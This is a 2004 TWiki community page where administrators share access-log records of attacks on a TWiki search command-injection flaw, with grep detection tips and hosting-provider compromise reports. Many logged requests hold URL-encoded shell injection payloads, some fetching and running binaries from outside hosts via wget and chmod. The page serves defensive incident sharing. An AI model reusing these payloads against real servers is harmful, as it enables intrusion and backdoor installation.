Tags:
create new tag
, view all tags

Have you been affected by SecurityAlertExecuteCommandsWithSearch ?

BUT if people correlate attacks then they might get their IP connection shut off before they actually get a vulnerable TWiki. This needs something like a wiki to be effective.

So sharing abuse reports could be helpful.

How to check if someone has attempted to attack your site

  • It seems that attempts on my dreamhost servers all used BEGIN in the string, which is visible in the Apache error.log file (or the equivalent on other web servers). If you've seen other patterns please add them.

Dreamhost

grep __BEGIN__ ~/logs/*/http/access.log*

Add your hosting provider here

Attempt Reports

MartinCleaver

/home/mrjc/logs/cleaver.org/http/access.log.0:213.140.17.96 - - [20/Nov/2004:05:17:53 -0800] "GET /view/Cvswebclient/WebHome?CGISESSID=f057354fbafe9d1b20840672070ac231&CGISESSID=f057354fbafe9d1b20840672070ac231&topic=doesnotexist1%27%3B+%28uname+-a%3B+id%3Buptime%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 652 "http://cleaver.org/twiki/bin/view/Cvswebclient/WebHome" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux)"
/home/mrjc/logs/cleaver.org/http/access.log.0:213.140.17.96 - - [20/Nov/2004:05:17:54 -0800] "GET /oops/doesnotexist1%20(uname%20-a%20iduptime)%20%20sed%20s/\\(.\\)/__BEGIN__\\1__END__.txt/%20fgrep%20-i%20-l%20--%20doesnotexist2?template=oopsnoweb&param1=ERROR%20doesnotexist1%20(uname%20-a%20iduptime)%20sed%20s/%5C(.%5C)/__BEGIN__%5C1__END__.txt.%20fgrep%20-i%20-l%20--%20doesnotexist2%20Missing%20Web HTTP/1.1" 200 726 "http://cleaver.org/twiki/bin/view/Cvswebclient/WebHome" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux)"
/home/mrjc/logs/cleaver.org/http/access.log.0:201.8.137.163 - - [20/Nov/2004:14:42:28 -0800] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 6638 "-" "Mozilla/3.0 (compatible; Indy Library)"
/home/mrjc/logs/cleaver.org/http/access.log.0:200.158.8.182 - - [20/Nov/2004:16:23:46 -0800] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 6638 "-" "Mozilla/3.0 (compatible; Indy Library)"
/home/mrjc/logs/cleaver.org/http/access.log.0:200.158.8.182 - - [20/Nov/2004:16:44:50 -0800] "GET /twiki/bin/search//?scope=text&search=doesnotexist1%27%3B+%28id%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.0" 200 3581 "-" "-"
/home/mrjc/logs/cleaver.org/http/access.log.2004-11-20:213.140.17.96 - - [20/Nov/2004:05:17:53 -0800] "GET /view/Cvswebclient/WebHome?CGISESSID=f057354fbafe9d1b20840672070ac231&CGISESSID=f057354fbafe9d1b20840672070ac231&topic=doesnotexist1%27%3B+%28uname+-a%3B+id%3Buptime%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 652 "http://cleaver.org/twiki/bin/view/Cvswebclient/WebHome" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux)"
/home/mrjc/logs/cleaver.org/http/access.log.2004-11-20:213.140.17.96 - - [20/Nov/2004:05:17:54 -0800] "GET /oops/doesnotexist1%20(uname%20-a%20iduptime)%20%20sed%20s/\\(.\\)/__BEGIN__\\1__END__.txt/%20fgrep%20-i%20-l%20--%20doesnotexist2?template=oopsnoweb&param1=ERROR%20doesnotexist1%20(uname%20-a%20iduptime)%20sed%20s/%5C(.%5C)/__BEGIN__%5C1__END__.txt.%20fgrep%20-i%20-l%20--%20doesnotexist2%20Missing%20Web HTTP/1.1" 200 726 "http://cleaver.org/twiki/bin/view/Cvswebclient/WebHome" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux)"
/home/mrjc/logs/cleaver.org/http/access.log.2004-11-20:201.8.137.163 - - [20/Nov/2004:14:42:28 -0800] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 6638 "-" "Mozilla/3.0 (compatible; Indy Library)"
/home/mrjc/logs/cleaver.org/http/access.log.2004-11-20:200.158.8.182 - - [20/Nov/2004:16:23:46 -0800] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 6638 "-" "Mozilla/3.0 (compatible; Indy Library)"
/home/mrjc/logs/cleaver.org/http/access.log.2004-11-20:200.158.8.182 - - [20/Nov/2004:16:44:50 -0800] "GET /twiki/bin/search//?scope=text&search=doesnotexist1%27%3B+%28id%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.0" 200 3581 "-" "-"
/home/mrjc/logs/conceptmapping.net/http/access.log.0:201.8.137.163 - - [20/Nov/2004:13:56:14 -0800] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)"
/home/mrjc/logs/conceptmapping.net/http/access.log.0:201.8.137.163 - - [20/Nov/2004:14:42:39 -0800] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)"
/home/mrjc/logs/conceptmapping.net/http/access.log.2004-11-19:200.165.224.206 - - [19/Nov/2004:18:54:08 -0800] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)"
/home/mrjc/logs/conceptmapping.net/http/access.log.2004-11-20:201.8.137.163 - - [20/Nov/2004:13:56:14 -0800] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)"
/home/mrjc/logs/conceptmapping.net/http/access.log.2004-11-20:201.8.137.163 - - [20/Nov/2004:14:42:39 -0800] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)"
/home/mrjc/logs/mbawiki.com/http/access.log.2004-11-19:200.232.210.221 - - [19/Nov/2004:17:17:41 -0800] "GET /twiki/bin/search/ManagerialEnvironment/?scope=text&search=doesnotexist1%27%3B+%28id%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.0" 404 - "-" "-"

Damage done

  • One account affected - looks like I missed it when patching - Dreamhost sent this email to me:
From: DreamHost Customer Support Team 
Date: Sun, 21 Nov 2004 10:20:06 -0800 (PST)
Subject: [mrjcleaver 3487179] Email System Abuse
Reply | Reply to all | Forward | Print | Add sender to contacts list | Trash this message | Report phishing | Show original
Hello,

An excessive amount of email was sent from your 'redbourn' user account
this morning.  We cannot allow that much email to be sent from a shared
hosting account as it monopolizes the available resources.  In addition,
you were running several persistent processes including an httpd server.
We don't allow that either.

It looks like your account was cracked and used by malicious people to
send out a bunch of spam email.  The crack came in through your Twiki
install.

Here is one of the GET commands that was used:

GET /twiki/pub/Plugins/KoalaSkin/sitemap.gif HTTP/1.1" 200 96
"http://redbourn.org.uk/twiki/bin/search/TWiki/?scope=text&web=on&search=
doesnotexist1%27%3B+%28cd+%2Ftmp%3Bwget+www.wget.home.ro%2Fhttpd%3Bchmod+
777+x++httpd%3B%2Ftmp%2Fhttpd%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN_
_%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2

Ensure that you are using the most up to date version ot the Twiki
software.  If not, we will not be able to allow you to continue running
it on our server.  Let us know if you have any questions.

Thanks!
Dallas

MS

201.8.137.163 - - [20/Nov/2004:23:19:32 +0000] "GET /twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28uname+-a
%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 404 229 " -" "Mozilla/3.0 (compatible; Indy Library)" 

Damage done

  • None: No code running

-- MartinCleaver - 21 Nov 2004

Main.ArthurClemens

I also run TWiki from a Dreamhost site. I disabled search now, but I still get these queries:

running search in Main:

200.162.230.113 - - [21/Nov/2004:04:02:53 -0800] "GET /cgi-bin/twiki/search/Main/?scope=text&search=
doesnotexist1%27%3B+%28cd+%2Fvar%2Ftmp%3Bwget+http%3A%2F%2Fsixth.ucsd.edu%2Fks%2Fbd%2Fr0nin%3Bchmod+
777+r0nin%3B.%2Fr0nin%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+
-l+--+%27doesnotexist2 HTTP/1.1" 200 - "http://www.visiblearea.com/cgi-bin/twiki/view/Main/WebSearch"
 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

from SearchResult:

80.116.136.64 - - [21/Nov/2004:09:02:12 -0800] "GET /twiki/bin/search/Main/SearchResult?search=doesnotexist1'%3B+(uname%20-a)+%7C+sed+'s%2F%5C(.*%5C)%2F__BEGIN__%5C1__END__.txt%2F'%3B+fgrep
+-i+-l+--+'doesnotexist2 HTTP/1.0" 404 - "-" "Links (0.99; Linux 2.7.1-fake i686; 128x48)"

from a formatted search:

200.161.250.245 - - [21/Nov/2004:11:13:22 -0800] "GET x/?scope=topic&regex=on&search=%5Ey?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3Bid%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27
doesnotexist2 HTTP/1.0" 400 466 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

Damage done

Dreamhost support mailed me: They installed stuff into /tmp and /var/tmp mostly [...] Basically, they installed a backdoor login program, some exploit attempts, etc.

-- ArthurClemens - 21 Nov 2004

Arthur - what and where was the PHPshell?

The wasters left this in one of the files "Simiens Crew" - Google:%22Simiens+Crew%22

-- MartinCleaver - 21 Nov 2004

It was in the cgi-bin folder. But I removed it, so I don't have details.

-- ArthurClemens - 21 Nov 2004

KennethLavrsen

My TWIki is run on my home server.

I patched the TWiki the same morning the warning was posted by PeterThoeny

I have so far seen 7 attempts

These are the access log entries

148.244.150.58 - - [14/Nov/2004:20:01:53 +0100] "GET /twiki/bin/view/TWiki/WebHome?raw=on HTTP/1.0" 200 15491 "http://www.google.it/search?hl=it&q=twiki+%2FWebHome+site%3A.dk&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:01:55 +0100] "GET /twiki/pub/TWiki/PatternSkin/layout.css HTTP/1.0" 200 1823 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome?raw=on" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:01:55 +0100] "GET /twiki/pub/TWiki/PatternSkin/style.css HTTP/1.0" 200 26609 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome?raw=on" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:01:57 +0100] "GET /twiki/pub/TWiki/TWikiLogos/kennethwiki-trans.gif HTTP/1.0" 200 1478 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome?raw=on" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:03 +0100] "GET /twiki/bin/view/TWiki/WebHome?raw=on HTTP/1.0" 200 13478 "http://www.google.it/search?hl=it&q=twiki+%2FWebHome+site%3A.dk&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:07 +0100] "GET /twiki/bin/view/TWiki/WebHome HTTP/1.0" 200 30515 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:10 +0100] "GET /twiki/pub/TWiki/TWikiLogos/twikiRobot131x64.gif HTTP/1.0" 200 7218 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:10 +0100] "GET /twiki/pub/TWiki/PatternSkin/i_arrow_down.gif HTTP/1.0" 200 56 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:10 +0100] "GET /twiki/pub/TWiki/SmiliesPlugin/smile.gif HTTP/1.0" 200 93 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:10 +0100] "GET /twiki/pub/TWiki/SmiliesPlugin/cool.gif HTTP/1.0" 200 124 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:10 +0100] "GET /twiki/pub/TWiki/TWikiDocGraphics/tip.gif HTTP/1.0" 200 123 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:11 +0100] "GET /twiki/pub/TWiki/TWikiDocGraphics/searchtopic.gif HTTP/1.0" 200 192 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:11 +0100] "GET /twiki/pub/TWiki/TWikiDocGraphics/home.gif HTTP/1.0" 200 172 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:11 +0100] "GET /twiki/pub/TWiki/TWikiDocGraphics/notify.gif HTTP/1.0" 200 183 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:11 +0100] "GET /twiki/pub/TWiki/TWikiDocGraphics/recentchanges.gif HTTP/1.0" 200 945 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:11 +0100] "GET /twiki/pub/TWiki/TWikiLogos/twikiRobot88x31.gif HTTP/1.0" 200 3501 "http://www.lavrsen.dk/twiki/bin/view/TWiki/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
148.244.150.58 - - [14/Nov/2004:20:02:14 +0100] "GET /twiki/bin/search/TWiki/SearchResult?search=doesnotexist1%27%3B+%28uname+-a%3B+id%2Cuptime%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.0" 


200.203.166.61 - - [18/Nov/2004:23:16:56 +0100] "GET /twiki/pub/TWiki/PatternSkin/layout.css HTTP/1.1" 200 1823 "http://www.lavrsen.dk/twiki/bin/rdiff/Sandbox/WebSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.203.166.61 - - [18/Nov/2004:23:16:54 +0100] "GET /twiki/bin/rdiff/Sandbox/WebSearch HTTP/1.1" 200 58390 "http://www.google.com.br/search?q=allinurl%3Atwiki*websearch+site%3Adk&hl=pt-BR" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.203.166.61 - - [18/Nov/2004:23:16:57 +0100] "GET /twiki/pub/TWiki/PatternSkin/style.css HTTP/1.1" 200 26609 "http://www.lavrsen.dk/twiki/bin/rdiff/Sandbox/WebSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.203.166.61 - - [18/Nov/2004:23:17:40 +0100] "GET /twiki/bin/view/Sandbox/WebSearch?CGISESSID=8c27b0af17dfeff1a71a6f8f76e558ba&search=doesnotexist1%27%3B+%28+cd+%2Fvar%2Ftmp%3Bwget+http%3A%2F%2Fwww.zona-de-juegos.com%2Fimages%2Fpowered%2Fcommandt%2Fxpl%2F44464%3Bchmod%2520777%252044464%3B.%2F44464+%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2&scope=text HTTP/1.1" 200 11908 "http://www.lavrsen.dk/twiki/bin/rdiff/Sandbox/WebSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.203.166.61 - - [18/Nov/2004:23:17:42 +0100] "GET /twiki/pub/TWiki/TWikiLogos/kennethwiki-trans.gif HTTP/1.1" 200 1478 "http://www.lavrsen.dk/twiki/bin/view/Sandbox/WebSearch?CGISESSID=8c27b0af17dfeff1a71a6f8f76e558ba&search=doesnotexist1%27%3B+%28+cd+%2Fvar%2Ftmp%3Bwget+http%3A%2F%2Fwww.zona-de-juegos.com%2Fimages%2Fpowered%2Fcommandt%2Fxpl%2F44464%3Bchmod%2520777%252044464%3B.%2F44464+%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2&scope=text" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 


61.149.37.106 - - [19/Nov/2004:18:19:16 +0100] "GET /twiki/pub/TWiki/PatternSkin/layout.css HTTP/1.1" 200 1823 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113"
61.149.37.106 - - [19/Nov/2004:18:19:10 +0100] "GET /twiki/bin/view/Motion/WebHome HTTP/1.1" 200 24235 "http://www.google.cl/search?q=allinurl%3A+twiki+site%3A.dk&btnG=B%C3%BAsqueda&hl=es&newwindow=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113"
61.149.37.106 - - [19/Nov/2004:18:19:19 +0100] "GET /twiki/pub/TWiki/PatternSkin/style.css HTTP/1.1" 200 26609 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113"
61.149.37.106 - - [19/Nov/2004:18:19:26 +0100] "GET /twiki/pub/TWiki/TWikiLogos/motion-trans.gif HTTP/1.1" 200 1948 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113"
61.149.37.106 - - [19/Nov/2004:18:19:35 +0100] "GET /twiki/bin/view/Motion/WebSearch?CGISESSID=d8ae5e63d290eac8626291c4d7556991&CGISESSID=d8ae5e63d290eac8626291c4d7556991 HTTP/1.1" 200 12023 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113"
61.149.37.106 - - [19/Nov/2004:18:20:28 +0100] "GET /twiki/bin/view/Motion/WebSearch?search=doesnotexist1%27%3B+%28uname+-a%3B+id%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2&scope=text HTTP/1.1" 200 12175 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebSearch?CGISESSID=d8ae5e63d290eac8626291c4d7556991&CGISESSID=d8ae5e63d290eac8626291c4d7556991" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113" 


202.95.134.214 - - [19/Nov/2004:22:36:24 +0100] "GET /twiki/bin/view/Motion/WebHome HTTP/1.1" 200 24235 "http://www.google.com/search?q=allinurl%3Atwiki%2Fbin%2F&hl=en&lr=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
202.95.134.214 - - [19/Nov/2004:22:36:31 +0100] "GET /twiki/pub/TWiki/PatternSkin/style.css HTTP/1.1" 200 26609 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
202.95.134.214 - - [19/Nov/2004:22:36:36 +0100] "GET /twiki/pub/TWiki/PatternSkin/layout.css HTTP/1.1" 200 1823 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
202.95.134.214 - - [19/Nov/2004:22:36:39 +0100] "GET /twiki/pub/TWiki/TWikiLogos/motion-trans.gif HTTP/1.1" 200 1948 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
202.95.134.214 - - [19/Nov/2004:22:37:10 +0100] "GET /twiki/bin/search/Motion/SearchResult?CGISESSID=122de48b9cbd6451bcd06d70a45b0a86&search=doesnotexist1%27%3B+%28uname+-a%3B+id%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 5158 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
202.95.134.214 - - [19/Nov/2004:22:37:14 +0100] "GET /twiki/pub/TWiki/PatternSkin/style.css HTTP/1.1" 304 - "http://www.lavrsen.dk/twiki/bin/search/Motion/SearchResult?CGISESSID=122de48b9cbd6451bcd06d70a45b0a86&search=doesnotexist1%27%3B+%28uname+-a%3B+id%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 


201.9.37.167 - - [20/Nov/2004:17:26:19 +0100] "GET /twiki/bin/view/Sandbox/WebSearch HTTP/1.1" 200 17062 "http://www.google.com.br/search?hl=pt-BR&q=allinurl%3Atwiki*websearch+.dk&btnG=Pesquisar&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.9.37.167 - - [20/Nov/2004:17:26:22 +0100] "GET /twiki/pub/TWiki/PatternSkin/layout.css HTTP/1.1" 200 1823 "http://www.lavrsen.dk/twiki/bin/view/Sandbox/WebSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.9.37.167 - - [20/Nov/2004:17:26:23 +0100] "GET /twiki/pub/TWiki/PatternSkin/style.css HTTP/1.1" 200 26609 "http://www.lavrsen.dk/twiki/bin/view/Sandbox/WebSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.9.37.167 - - [20/Nov/2004:17:26:25 +0100] "GET /twiki/pub/TWiki/TWikiLogos/kennethwiki-trans.gif HTTP/1.1" 200 1478 "http://www.lavrsen.dk/twiki/bin/view/Sandbox/WebSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.9.37.167 - - [20/Nov/2004:17:26:34 +0100] "GET /twiki/bin/view/Sandbox/WebSearch?CGISESSID=c5e2d166333bc19ae4c22c6289608188&search=doesnotexist1%27%3B+%28+uname+-a%3Bid+%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2&scope=text HTTP/1.1" 200 11671 "http://www.lavrsen.dk/twiki/bin/view/Sandbox/WebSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 


194.102.131.10 - - [21/Nov/2004:02:46:01 +0100] "GET /twiki/bin/view/Motion/VideoFourLinuxLoopbackDevice HTTP/1.1" 200 30607 "http://www.google.ro/search?q=twiki+*.cc&hl=ro&lr=&start=10&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.10 - - [21/Nov/2004:02:46:03 +0100] "GET /twiki/pub/TWiki/PatternSkin/layout.css HTTP/1.1" 200 1823 "http://www.lavrsen.dk/twiki/bin/view/Motion/VideoFourLinuxLoopbackDevice" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.10 - - [21/Nov/2004:02:46:03 +0100] "GET /twiki/pub/TWiki/PatternSkin/style.css HTTP/1.1" 200 26609 "http://www.lavrsen.dk/twiki/bin/view/Motion/VideoFourLinuxLoopbackDevice" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.10 - - [21/Nov/2004:02:46:05 +0100] "GET /twiki/pub/TWiki/TWikiLogos/motion-trans.gif HTTP/1.1" 200 1948 "http://www.lavrsen.dk/twiki/bin/view/Motion/VideoFourLinuxLoopbackDevice" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.10 - - [21/Nov/2004:02:46:05 +0100] "GET /twiki/pub/TWiki/SmiliesPlugin/smile.gif HTTP/1.1" 200 93 "http://www.lavrsen.dk/twiki/bin/view/Motion/VideoFourLinuxLoopbackDevice" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.10 - - [21/Nov/2004:02:46:05 +0100] "GET /twiki/pub/TWiki/TablePlugin/diamond.gif HTTP/1.1" 200 881 "http://www.lavrsen.dk/twiki/bin/view/Motion/VideoFourLinuxLoopbackDevice" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.10 - - [21/Nov/2004:02:46:05 +0100] "GET /twiki/pub/icn/else.gif HTTP/1.1" 200 139 "http://www.lavrsen.dk/twiki/bin/view/Motion/VideoFourLinuxLoopbackDevice" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.10 - - [21/Nov/2004:02:46:59 +0100] "GET /twiki/bin/view/Motion/WebSearch?CGISESSID=5807d4dc20f49ffa5fec3b42ca43abde&CGISESSID=5807d4dc20f49ffa5fec3b42ca43abde HTTP/1.1" 200 12023 "http://www.lavrsen.dk/twiki/bin/view/Motion/VideoFourLinuxLoopbackDevice" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.10 - - [21/Nov/2004:02:47:01 +0100] "GET /twiki/pub/TWiki/PatternSkin/layout.css HTTP/1.1" 304 - "http://www.lavrsen.dk/twiki/bin/view/Motion/WebSearch?CGISESSID=5807d4dc20f49ffa5fec3b42ca43abde&CGISESSID=5807d4dc20f49ffa5fec3b42ca43abde" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
